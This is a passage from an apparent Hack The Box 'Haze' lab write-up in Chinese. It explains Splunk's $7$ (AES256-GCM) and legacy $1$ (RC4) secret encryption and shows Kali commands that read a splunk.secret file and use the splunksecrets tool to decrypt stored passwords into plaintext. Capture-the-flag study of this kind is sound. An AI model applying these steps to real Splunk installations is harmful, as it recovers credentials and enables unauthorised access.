安装:
uv tool install splunksecrets
or
python -m pip install splunksecrets
首先需要获取 splunk.secret ,通常位于 /Splunk/etc/auth/splunk.secret
从 Splunk 7.2 开始,AES256-GCM 用于加密机密信息,在配置文件中,加密密码中的 $7$ 表示机密信息。PBKDF2 算法使用 disk-encryption 静态盐值和单次迭代,从 PBKDF2 splunk.secret 的全部 254 个字节(文件末尾的换行符会被删除)中派生出加密密钥。然后,此 256 位密钥将用作 AES256-GCM 的加密密钥,并随机生成一个 16 字节的初始化向量。加密过程会生成密文以及用于完整性验证的“标签”。iv、密文和标签(按此顺序)连接在一起,进行 base64 编码,并在前面添加 $7$ 生成配置文件中显示的加密密码。如果 如果密钥小于 254 字节,则用空字节填充。
┌──(root㉿kali)-[~/Desktop/htb/Haze]
└─# splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24
Splunk 7.2 之前的版本使用 RC4 加密密钥,配置文件中加密密码中的 $1$ 表示该密钥。明文密码先与静态盐值 ( DEFAULTSA ) 进行异或运算,然后使用 splunk.secret 的前 16 个字节作为密钥进行 RC4 加密。生成的密文经过 base64 编码,并在前面添加 $1$ 即可生成配置文件中显示的加密密码。
┌──(root㉿kali)-[~/Desktop/htb/Haze/splunk_backup]
└─# find ./Splunk -name splunk.secret
./Splunk/etc/auth/splunk.secret
┌──(root㉿kali)-[~/Desktop/htb/Haze/splunk_backup]
└─# cat ./Splunk/etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B
┌──(root㉿kali)-[~/…/splunk_backup/Splunk/etc/auth]
└─# splunksecrets splunk-legacy-decrypt -S splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
Sp1unkadmin@2k24